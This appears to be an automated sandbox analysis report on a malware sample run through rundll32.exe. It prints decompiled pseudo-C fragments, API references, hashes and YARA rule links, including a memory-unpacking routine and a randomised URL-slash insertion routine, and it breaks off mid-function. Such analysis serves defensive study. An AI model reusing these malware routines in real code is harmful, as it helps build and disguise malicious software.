Instruction ID: 90c5162267676b3294933cbc2e4a7ff21820c86c212523b22110f5bcfa6caae3
Opcode Fuzzy Hash: 9fad31eab62fe86611a6c50f630feb1e95a2f684b6aa828bdcc9f79d4f8461ea
Instruction Fuzzy Hash: 1821DAB2D80215ABCB10BFE588D58EFB3BA9B44354B10E4A6FA11EF100D770B944CB60

Uniqueness

Uniqueness Score: -1.00%

Function 02EA17E5, Relevance: 6.1, APIs: 4, Instructions: 61
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E02EA17E5(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x2ead238, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x2ead250; // 0x77f3203
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x2ead250 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

0x02ea17ed
0x02ea17f0
0x02ea17f6
0x02ea180e
0x02ea1810
0x02ea1815
0x02ea1817
0x02ea181a
0x02ea181c
0x02ea181f
0x02ea1821
0x02ea1821
0x02ea1823
0x02ea182e
0x02ea1833
0x02ea1844
0x02ea184c
0x02ea1851
0x02ea1854
0x02ea1857
0x02ea1859
0x02ea185c
0x02ea185f
0x02ea185f
0x02ea1862
0x02ea186d
0x02ea1872
0x02ea187c

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,02EA1C49,00000000,?,?,02EA20C2,?,039C95B0), ref: 02EA17F0
RtlAllocateHeap.NTDLL(00000000,?), ref: 02EA1808
memcpy.NTDLL(00000000,?,-00000008,?,?,?,02EA1C49,00000000,?,?,02EA20C2,?,039C95B0), ref: 02EA184C
memcpy.NTDLL(00000001,?,00000001), ref: 02EA186D

Memory Dump Source

Source File: 00000002.00000002.479405734.0000000002EA1000.00000020.00000001.sdmp, Offset: 02EA0000, based on PE: true

Associated: 00000002.00000002.479379747.0000000002EA0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479456411.0000000002EAC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.479484938.0000000002EAD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479532107.0000000002EAF000.00000002.00000001.sdmp Download File

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID:
API String ID: 1819133394-0
Opcode ID: de83651b8de9864efe846247a3f7fad6710ec196193dc7f51277b3777b32511b
Instruction ID: 89793b9b0c024724316ffef4c1885ac98b3880bb9e9c3fcd6f20d2208123c544
Opcode Fuzzy Hash: de83651b8de9864efe846247a3f7fad6710ec196193dc7f51277b3777b32511b
Instruction Fuzzy Hash: F0110672E80214AFD7108B6ADC84E9EBBEEDF80360F154176F5089B240EB74AE50C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E1584, Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 6E1E15AA

Part of subcall function 6E1E13CF: __fltout2.LIBCMT ref: 6E1E13FB

__cftog_l.LIBCMT ref: 6E1E15D0
__cftoe_l.LIBCMT ref: 6E1E1602

Memory Dump Source

Source File: 00000002.00000002.483277940.000000006E1B0000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: false

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction ID: 466b781825e0290c6ebb5ca47bbab6666077f9babd7137ed273a915d63ef55cd
Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction Fuzzy Hash: FE11697210054ABBCF124FC5CC11CEE3F66BF1A354F598814FA6958920D732C9B6BB81

Uniqueness

Uniqueness Score: -1.00%

Function 02EA6840, Relevance: 6.0, APIs: 4, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02EA6840(void* __esi) {
				struct _SECURITY_ATTRIBUTES* _v4;
				void* _t8;
				void* _t10;

				_v4 = 0;
				memset(__esi, 0, 0x38);
				_t8 = CreateEventA(0, 1, 0, 0);
				 *(__esi + 0x1c) = _t8;
				if(_t8 != 0) {
					_t10 = CreateEventA(0, 1, 1, 0);
					 *(__esi + 0x20) = _t10;
					if(_t10 == 0) {
						CloseHandle( *(__esi + 0x1c));
					} else {
						_v4 = 1;
					}
				}
				return _v4;
			}

0x02ea684a
0x02ea684e
0x02ea6863
0x02ea6865
0x02ea686a
0x02ea6870
0x02ea6872
0x02ea6877
0x02ea6882
0x02ea6879
0x02ea6879
0x02ea6879
0x02ea6877
0x02ea6890

APIs

memset.NTDLL ref: 02EA684E
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,74B481D0), ref: 02EA6863
CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 02EA6870
CloseHandle.KERNEL32(?), ref: 02EA6882

Memory Dump Source

Source File: 00000002.00000002.479405734.0000000002EA1000.00000020.00000001.sdmp, Offset: 02EA0000, based on PE: true

Associated: 00000002.00000002.479379747.0000000002EA0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479456411.0000000002EAC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.479484938.0000000002EAD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479532107.0000000002EAF000.00000002.00000001.sdmp Download File

Similarity

API ID: CreateEvent$CloseHandlememset
String ID:
API String ID: 2812548120-0
Opcode ID: 56cd5eb4245dcbf47dbd29fe223d39b30900d89d5be9046cac302bfa078b50a8
Instruction ID: 9f4fd610c1c75f02055cfdba40c85fc651be4cca90f14a0f8cef186ea964294a
Opcode Fuzzy Hash: 56cd5eb4245dcbf47dbd29fe223d39b30900d89d5be9046cac302bfa078b50a8
Instruction Fuzzy Hash: 5CF05EF15843087FD7106F26DCC4C27BBECEBA229DB159A2EF14286111C672B8598E60

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D6788, Relevance: 6.0, APIs: 4, Instructions: 34COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 6E1D67A2

Part of subcall function 6E1D5012: __FF_MSGBANNER.LIBCMT ref: 6E1D5035
Part of subcall function 6E1D5012: __NMSG_WRITE.LIBCMT ref: 6E1D503C

std::bad_alloc::bad_alloc.LIBCMT ref: 6E1D67C5

Part of subcall function 6E1D676D: std::exception::exception.LIBCMT ref: 6E1D6779

std::bad_exception::bad_exception.LIBCMTD ref: 6E1D67D9
__CxxThrowException@8.LIBCMT ref: 6E1D67E7

Memory Dump Source

Source File: 00000002.00000002.483277940.000000006E1B0000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: false

Similarity

API ID: Exception@8Throw_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
String ID:
API String ID: 1802512180-0
Opcode ID: f52788884c56545f419f4f68759d572c4302e8625c0c434577ccb9860d0caa24
Instruction ID: 2e31939c2eff613c59e4ab0f7ba1b1fc1dcadfc203dec4cc9e2f3ff593e6b879
Opcode Fuzzy Hash: f52788884c56545f419f4f68759d572c4302e8625c0c434577ccb9860d0caa24
Instruction Fuzzy Hash: 66F0823142450D6BDB44EBE5DD14DCD36AD9B09238F204819D812AA080DF25A9DDF591

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D53B1, Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 6E1D53BD

Part of subcall function 6E1DAEC6: __getptd_noexit.LIBCMT ref: 6E1DAEC9
Part of subcall function 6E1DAEC6: __amsg_exit.LIBCMT ref: 6E1DAED6

__getptd.LIBCMT ref: 6E1D53D4
__amsg_exit.LIBCMT ref: 6E1D53E2
__lock.LIBCMT ref: 6E1D53F2

Memory Dump Source

Source File: 00000002.00000002.483277940.000000006E1B0000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: false

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID:
API String ID: 3521780317-0
Opcode ID: 2ccc3ec4292b646d115d29317f397857f4835b6f93450465903ee9f0d7e422ad
Instruction ID: 3ca96fe2bcc0742920d2489d79225be4d665731175bf95217e4f9f1d0d4014be
Opcode Fuzzy Hash: 2ccc3ec4292b646d115d29317f397857f4835b6f93450465903ee9f0d7e422ad
Instruction Fuzzy Hash: 83F03032950B04EBD761EBF8840478E72A9EF0172AF604E1AD4519B2D0DBF499C8FB52

Uniqueness

Uniqueness Score: -1.00%

Function 02EA23F4, Relevance: 6.0, APIs: 4, Instructions: 29
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E02EA23F4(void** __esi) {
				char* _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				intOrPtr _t11;
				void* _t12;
				void** _t14;

				_t14 = __esi;
				_t4 =  *0x2ead32c; // 0x39c95b0
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x2ead32c; // 0x39c95b0
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t14;
				if(_t8 != 0 && _t8 != 0x2ead030) {
					HeapFree( *0x2ead238, 0, _t8);
				}
				_t14[1] = E02EA486F(_v0, _t14);
				_t11 =  *0x2ead32c; // 0x39c95b0
				_t12 = _t11 + 0x40;
				__imp__(_t12);
				return _t12;
			}

0x02ea23f4
0x02ea23f4
0x02ea23fd
0x02ea240d
0x02ea240d
0x02ea2412
0x02ea2417
0x00000000
0x00000000
0x02ea2407
0x02ea2407
0x02ea2419
0x02ea241d
0x02ea242f
0x02ea242f
0x02ea243f
0x02ea2442
0x02ea2447
0x02ea244b
0x02ea2451

APIs

RtlEnterCriticalSection.NTDLL(039C9570), ref: 02EA23FD
Sleep.KERNEL32(0000000A,?,02EA5D25), ref: 02EA2407
HeapFree.KERNEL32(00000000,00000000,?,02EA5D25), ref: 02EA242F
RtlLeaveCriticalSection.NTDLL(039C9570), ref: 02EA244B

Memory Dump Source

Source File: 00000002.00000002.479405734.0000000002EA1000.00000020.00000001.sdmp, Offset: 02EA0000, based on PE: true

Associated: 00000002.00000002.479379747.0000000002EA0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479456411.0000000002EAC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.479484938.0000000002EAD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479532107.0000000002EAF000.00000002.00000001.sdmp Download File

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: ca2dafb87a0ce7704869b111e969074dbc41fc07264879a798183c757a8af594
Instruction ID: 680530c6d22c33c24422fe77a383471f240fdd40c232cf99fc498a5cdfe9b02b
Opcode Fuzzy Hash: ca2dafb87a0ce7704869b111e969074dbc41fc07264879a798183c757a8af594
Instruction Fuzzy Hash: 12F05870AC02409BD7109F7AEC9AF0677E4EF18744B90E801FA01DA250CB30F8A4CB25

Uniqueness

Uniqueness Score: -1.00%

Function 02EA1B42, Relevance: 6.0, APIs: 4, Instructions: 29
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02EA1B42() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x2ead26c; // 0x204
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x2ead2bc; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x2ead26c; // 0x204
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x2ead238; // 0x35d0000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}

0x02ea1b42
0x02ea1b49
0x02ea1b93
0x02ea1b95
0x02ea1b95
0x02ea1b4d
0x02ea1b53
0x02ea1b58
0x02ea1b5c
0x02ea1b62
0x02ea1b69
0x00000000
0x00000000
0x02ea1b6b
0x02ea1b70
0x00000000
0x00000000
0x00000000
0x02ea1b70
0x02ea1b72
0x02ea1b7a
0x02ea1b7d
0x02ea1b7d
0x02ea1b83
0x02ea1b8a
0x02ea1b8d
0x02ea1b8d
0x00000000

APIs

SetEvent.KERNEL32(00000204,00000001,02EA4F0E), ref: 02EA1B4D
SleepEx.KERNEL32(00000064,00000001), ref: 02EA1B5C
CloseHandle.KERNEL32(00000204), ref: 02EA1B7D
HeapDestroy.KERNEL32(035D0000), ref: 02EA1B8D

Memory Dump Source

Source File: 00000002.00000002.479405734.0000000002EA1000.00000020.00000001.sdmp, Offset: 02EA0000, based on PE: true

Associated: 00000002.00000002.479379747.0000000002EA0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479456411.0000000002EAC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.479484938.0000000002EAD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479532107.0000000002EAF000.00000002.00000001.sdmp Download File

Similarity

API ID: CloseDestroyEventHandleHeapSleep
String ID:
API String ID: 4109453060-0
Opcode ID: 0f796d257f9497651455140182535d6bcadb22955612d003a982540e099a8442
Instruction ID: 6592cb9ee2ac1a70656dd33920f47226ba2497a2ddef833c0f873efaf564aeb5
Opcode Fuzzy Hash: 0f796d257f9497651455140182535d6bcadb22955612d003a982540e099a8442
Instruction Fuzzy Hash: 83F08C31EC2311C7DB105B3BECA8E023B98AB04764B946A10B80DDF6C0EB30F890D660

Uniqueness

Uniqueness Score: -1.00%

Function 02EA6702, Relevance: 6.0, APIs: 4, Instructions: 28
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E02EA6702() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x2ead32c; // 0x39c95b0
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x2ead32c; // 0x39c95b0
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x2ead32c; // 0x39c95b0
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x2eae81a) {
					HeapFree( *0x2ead238, 0, _t10);
					_t7 =  *0x2ead32c; // 0x39c95b0
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}

0x02ea6702
0x02ea670b
0x02ea671b
0x02ea671b
0x02ea6720
0x02ea6725
0x00000000
0x00000000
0x02ea6715
0x02ea6715
0x02ea6727
0x02ea672c
0x02ea6730
0x02ea6743
0x02ea6749
0x02ea6749
0x02ea6752
0x02ea6754
0x02ea6758
0x02ea675e

APIs

RtlEnterCriticalSection.NTDLL(039C9570), ref: 02EA670B
Sleep.KERNEL32(0000000A,?,02EA5D25), ref: 02EA6715
HeapFree.KERNEL32(00000000,?,?,02EA5D25), ref: 02EA6743
RtlLeaveCriticalSection.NTDLL(039C9570), ref: 02EA6758

Memory Dump Source

Source File: 00000002.00000002.479405734.0000000002EA1000.00000020.00000001.sdmp, Offset: 02EA0000, based on PE: true

Associated: 00000002.00000002.479379747.0000000002EA0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479456411.0000000002EAC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.479484938.0000000002EAD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479532107.0000000002EAF000.00000002.00000001.sdmp Download File

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: f0eb96a4934c4d6b59dd72232a21e766b4fbde1e93aa58d847d018f1ae5ac0e8
Instruction ID: cf62be19618df14e65bd7731e097e08d9c07455ae1a34e59ebe1ed7b8de4a495
Opcode Fuzzy Hash: f0eb96a4934c4d6b59dd72232a21e766b4fbde1e93aa58d847d018f1ae5ac0e8
Instruction Fuzzy Hash: 6DF0FE74EC01009FEB148F66DDAEF1577E5AB19704B989816F906CB760C770F8A4CE14

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D83B6, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 6E1D83C5

Part of subcall function 6E1DAEC6: __getptd_noexit.LIBCMT ref: 6E1DAEC9
Part of subcall function 6E1DAEC6: __amsg_exit.LIBCMT ref: 6E1DAED6

__getptd.LIBCMT ref: 6E1D83D3

Strings

csm, xrefs: 6E1D83E1

Memory Dump Source

Source File: 00000002.00000002.483277940.000000006E1B0000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: false

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: csm
API String ID: 803148776-1018135373
Opcode ID: b379784f21376378956890797898c50fa94f265a2b5d3dfdd8b7aa5412bfc9b9
Instruction ID: aa507e5cda70014c3e7474cb227d449d61db69846202610f7c8ca017137f1eda
Opcode Fuzzy Hash: b379784f21376378956890797898c50fa94f265a2b5d3dfdd8b7aa5412bfc9b9
Instruction Fuzzy Hash: B4016935804605CFCB66DFE0D490B9DB3B9BF24311F21A82ED45196690DF3195CEEB41

Uniqueness

Uniqueness Score: -1.00%

Function 02EA5AF1, Relevance: 5.1, APIs: 4, Instructions: 70
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E02EA5AF1(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E02EAA71F(_t2);
				if(_t34 != 0) {
					_t30 = E02EAA71F(_t28);
					if(_t30 == 0) {
						E02EAA734(_t34);
					} else {
						_t39 = _a4;
						_t22 = E02EAA782(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E02EAA782(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}

0x02ea5af1
0x02ea5afb
0x02ea5afd
0x02ea5b03
0x02ea5b03
0x02ea5b0c
0x02ea5b10
0x02ea5b1c
0x02ea5b20
0x02ea5b94
0x02ea5b22
0x02ea5b22
0x02ea5b26
0x02ea5b2b
0x02ea5b30
0x02ea5b4a
0x02ea5b39
0x02ea5b39
0x02ea5b3d
0x02ea5b40
0x02ea5b45
0x02ea5b45
0x02ea5b4f
0x02ea5b77
0x02ea5b7d
0x02ea5b80
0x02ea5b51
0x02ea5b53
0x02ea5b5b
0x02ea5b66
0x02ea5b6b
0x02ea5b6b
0x02ea5b87
0x02ea5b8e
0x02ea5b8f
0x02ea5b8f
0x02ea5b20
0x02ea5b9f

APIs

lstrlen.KERNEL32(00000000,00000008,?,74B04D40,?,?,02EA3E08,?,?,?,?,00000102,02EA67B8,?,?,00000000), ref: 02EA5AFD

Part of subcall function 02EAA71F: RtlAllocateHeap.NTDLL(00000000,00000000,02EA5595), ref: 02EAA72B

Part of subcall function 02EAA782: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,02EA5B2B,00000000,00000001,00000001,?,?,02EA3E08,?,?,?,?,00000102), ref: 02EAA790
Part of subcall function 02EAA782: StrChrA.SHLWAPI(?,0000003F,?,?,02EA3E08,?,?,?,?,00000102,02EA67B8,?,?,00000000,00000000), ref: 02EAA79A

memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,02EA3E08,?,?,?,?,00000102,02EA67B8,?), ref: 02EA5B5B
lstrcpy.KERNEL32(00000000,00000000), ref: 02EA5B6B
lstrcpy.KERNEL32(00000000,00000000), ref: 02EA5B77

Memory Dump Source

Source File: 00000002.00000002.479405734.0000000002EA1000.00000020.00000001.sdmp, Offset: 02EA0000, based on PE: true

Associated: 00000002.00000002.479379747.0000000002EA0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479456411.0000000002EAC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.479484938.0000000002EAD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479532107.0000000002EAF000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrcpy$AllocateHeaplstrlenmemcpy
String ID:
API String ID: 3767559652-0
Opcode ID: b27d2dc1abfb6d3a18028ca3ce89ac7b4c62fffd87539dd06dfc4806860140b3
Instruction ID: 2f5b6a7a140ed3e5ea045dc270b95ecb511afaf2984d1056fa71d502a666ab3b
Opcode Fuzzy Hash: b27d2dc1abfb6d3a18028ca3ce89ac7b4c62fffd87539dd06dfc4806860140b3
Instruction Fuzzy Hash: A621D2B6945315EFCB125F74C8B4AAB7FBAAF06289B54E065F9049F200D730E940CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 02EA45C6, Relevance: 5.0, APIs: 4, Instructions: 39
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02EA45C6(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E02EAA71F(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}

0x02ea45db
0x02ea45df
0x02ea45e9
0x02ea45ee
0x02ea45f3
0x02ea45f5
0x02ea45fd
0x02ea4602
0x02ea4610
0x02ea4615
0x02ea461f

APIs

lstrlenW.KERNEL32(004F0053,?,74B05520,00000008,039C935C,?,02EA8D93,004F0053,039C935C,?,?,?,?,?,?,02EA523E), ref: 02EA45D6
lstrlenW.KERNEL32(02EA8D93,?,02EA8D93,004F0053,039C935C,?,?,?,?,?,?,02EA523E), ref: 02EA45DD

Part of subcall function 02EAA71F: RtlAllocateHeap.NTDLL(00000000,00000000,02EA5595), ref: 02EAA72B

memcpy.NTDLL(00000000,004F0053,74B069A0,?,?,02EA8D93,004F0053,039C935C,?,?,?,?,?,?,02EA523E), ref: 02EA45FD
memcpy.NTDLL(74B069A0,02EA8D93,00000002,00000000,004F0053,74B069A0,?,?,02EA8D93,004F0053,039C935C), ref: 02EA4610

Memory Dump Source

Source File: 00000002.00000002.479405734.0000000002EA1000.00000020.00000001.sdmp, Offset: 02EA0000, based on PE: true

Associated: 00000002.00000002.479379747.0000000002EA0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479456411.0000000002EAC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.479484938.0000000002EAD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479532107.0000000002EAF000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrlenmemcpy$AllocateHeap
String ID:
API String ID: 2411391700-0
Opcode ID: 0144b6e432f04ed82523a6e6f2524c56b5162b295594c73a1216302c02b66a8f
Instruction ID: 9792a69bed7976b9b877d5c05ce4f2022b84e16fecae4cf5e14d263959319aa1
Opcode Fuzzy Hash: 0144b6e432f04ed82523a6e6f2524c56b5162b295594c73a1216302c02b66a8f
Instruction Fuzzy Hash: D6F04976900118FBCF11EFA9CC84C8F7BADEF093547158062FA08DB201E735EA148BA0

Uniqueness

Uniqueness Score: -1.00%

Function 02EA361A, Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(039C9A78,00000000,00000000,7742C740,02EA20ED,00000000), ref: 02EA362A
lstrlen.KERNEL32(?), ref: 02EA3632

Part of subcall function 02EAA71F: RtlAllocateHeap.NTDLL(00000000,00000000,02EA5595), ref: 02EAA72B

lstrcpy.KERNEL32(00000000,039C9A78), ref: 02EA3646
lstrcat.KERNEL32(00000000,?), ref: 02EA3651

Memory Dump Source

Source File: 00000002.00000002.479405734.0000000002EA1000.00000020.00000001.sdmp, Offset: 02EA0000, based on PE: true

Associated: 00000002.00000002.479379747.0000000002EA0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479456411.0000000002EAC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.479484938.0000000002EAD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479532107.0000000002EAF000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrlen$AllocateHeaplstrcatlstrcpy
String ID:
API String ID: 74227042-0
Opcode ID: e52a71bdaca33a8653589caad58103f5389606a386a683c804faeddf26abeb57
Instruction ID: c7e6b12145db4ce18249fcec6cd15945daf22e1b79493bc8fdd0deb139193f44
Opcode Fuzzy Hash: e52a71bdaca33a8653589caad58103f5389606a386a683c804faeddf26abeb57
Instruction Fuzzy Hash: 64E09233981621678711ABE9AC88C9BBBBDEF896517140827F700D7210C725A851CBA1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 1844 Parent PID: 1636 rundll32.exeCOMMON

Executed Functions

Function 6E1DD186, Relevance: 66.4, APIs: 44, Instructions: 432COMMON

Download Yara Rule

APIs

___getlocaleinfo.LIBCMT ref: 6E1DD1BD
___getlocaleinfo.LIBCMT ref: 6E1DD1D2
___getlocaleinfo.LIBCMT ref: 6E1DD1E7
___getlocaleinfo.LIBCMT ref: 6E1DD1FC
___getlocaleinfo.LIBCMT ref: 6E1DD214
___getlocaleinfo.LIBCMT ref: 6E1DD229
___getlocaleinfo.LIBCMT ref: 6E1DD23B
___getlocaleinfo.LIBCMT ref: 6E1DD250
___getlocaleinfo.LIBCMT ref: 6E1DD268
___getlocaleinfo.LIBCMT ref: 6E1DD27D

Memory Dump Source

Source File: 00000005.00000002.487375933.000000006E1B0000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: false

Similarity

API ID: ___getlocaleinfo
String ID:
API String ID: 1937885557-0
Opcode ID: eabbdf657e399f07c2ee4d9dc041221e202d76291481bf30a1e5e3ccc471cc6b
Instruction ID: 517100233a267b388a3115fc3f534ab3b261f572310cf674ae543865285e25d9
Opcode Fuzzy Hash: eabbdf657e399f07c2ee4d9dc041221e202d76291481bf30a1e5e3ccc471cc6b
Instruction Fuzzy Hash: 6FE1D0B290060DBEEF12CAF0CC45DFFB7BDEB04748F44092AB655E3450EA71AA459760

Uniqueness

Uniqueness Score: -1.00%

Function 6E20434D, Relevance: 13.8, APIs: 9, Instructions: 318memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,00000984,00003000,00000040,00000984,6E203DA0), ref: 6E20440A
VirtualAlloc.KERNEL32(00000000,000000A9,00003000,00000040,6E203DFF), ref: 6E204441
VirtualAlloc.KERNEL32(00000000,00014055,00003000,00000040), ref: 6E2044A1
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E2044D7
VirtualProtect.KERNEL32(6E1A0000,00000000,00000004,6E20432C), ref: 6E2045DC
VirtualProtect.KERNEL32(6E1A0000,00001000,00000004,6E20432C), ref: 6E204603
VirtualProtect.KERNEL32(00000000,?,00000002,6E20432C), ref: 6E2046D0
VirtualProtect.KERNEL32(00000000,?,00000002,6E20432C,?), ref: 6E204726
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E204742

Memory Dump Source

Source File: 00000005.00000002.487634103.000000006E203000.00000040.00020000.sdmp, Offset: 6E203000, based on PE: false

Similarity

API ID: Virtual$Protect$Alloc$Free
String ID:
API String ID: 2574235972-0
Opcode ID: a6d96d1dbdd5adef407acf436f0e5e0eb20350914394ba89f38f1094e73ed8d8
Instruction ID: daca50e72d554e6f2bda88c07d6aad315520f13b274166a7ba2db3b46f3f6995
Opcode Fuzzy Hash: a6d96d1dbdd5adef407acf436f0e5e0eb20350914394ba89f38f1094e73ed8d8
Instruction Fuzzy Hash: E9D192F6500602DFDB11DF54C8A0BB177A6FF9A350B1941B5ED099F29AD770B801CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 01185A27, Relevance: 10.6, APIs: 7, Instructions: 81
nativeCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E01185A27(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
